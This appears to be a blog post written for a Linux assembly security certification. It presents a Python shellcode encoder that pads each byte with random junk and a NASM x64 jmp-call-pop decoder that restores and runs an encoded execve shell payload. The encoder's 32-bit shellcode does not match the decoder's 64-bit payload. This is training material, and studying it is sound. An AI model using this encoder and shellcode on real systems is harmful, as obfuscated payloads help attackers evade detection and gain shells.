How encoder work:
Get random number between 1-3 (link to python encoder script)
After add control number to shellcode, add junk bytes
Example:
-------------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
-------------------------------------------------------------------------
G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes
#!/usr/bin/python from random import randint #30 bytes #shellcode - execve stack version def get_random(ident): if ident == 'number': return randint(1,3) elif ident == 'char': return randint(65,122)#only [a-z[]\^_`A-Z] shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") encoded = "" #end = "\\xf0\\x0d" for x in bytearray(shellcode): encoded += '\\x%02x' % x random = get_random('number') encoded += '\\x%02x' % random for i in range(random-1): encoded += '\\x%02x' % get_random('char') #encoded += end #probably we will need it for correct jump print encoded print print encoded.replace("\\x", ",0x")[1:] print 'Initial len: %d, encoded len: %d' % (len(shellcode), len(encoded)/4)
Decoder.nasm
section .text global _start _start: jmp short end ; jmp pop call decoder: ; clean up the registers pop rsi ; get addr of shellcode putted by call starter push rsi ; backup for call :D mov rdx, rsi ; mov shellcode start addr to esi (source) mov rdi, rsi ; mov shellcode start addr to edi (destination) inc rsi ; point to the first dest byte, how many bytes we need to remove/espace inc rdi ; point to the first random number push byte 0x53 pop rcx ;83 - loop counter/your shellcode length, if you use diferent shellcode need adjust it restore: xor rax, rax ;eax xor rbx, rbx ;ebx mov al, byte [rdi] ; read distance to next byte add rax, rdi ; eax = addr of the next valid byte mov bl, byte [rax] ; bl = next valid byte of the shellcode mov byte [rdx], bl ; move it to the final position mov rdi, rax ; put latest valid pisition into edi inc rdi ; next distance inc rdx ; next valid byte loop restore ; loop pop rsi ; call shellcode call rsi end: call decoder ; put shellcode addr into stack shelcode: db 0x48,0x01,0x31,0x01,0xc0,0x01,0x50,0x03,0x69,0x5b,0x48,0x01,0xbb,0x03,0x7a,0x4d,0x2f,0x03,0x60,0x49,0x62,0x01,0x69,0x01,0x6e,0x01,0x2f,0x02,0x58,0x2f,0x02,0x76,0x73,0x02,0x7a,0x68,0x01,0x53,0x03,0x71,0x62,0x48,0x01,0x89,0x02,0x7a,0xe7,0x01,0x50,0x03,0x6d,0x51,0x48,0x02,0x42,0x89,0x01,0xe2,0x02,0x51,0x57,0x03,0x71,0x59,0x48,0x02,0x54,0x89,0x01,0xe6,0x03,0x46,0x6c,0xb0,0x03,0x4b,0x61,0x3b,0x01,0x0f,0x02,0x71,0x05,0x01
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: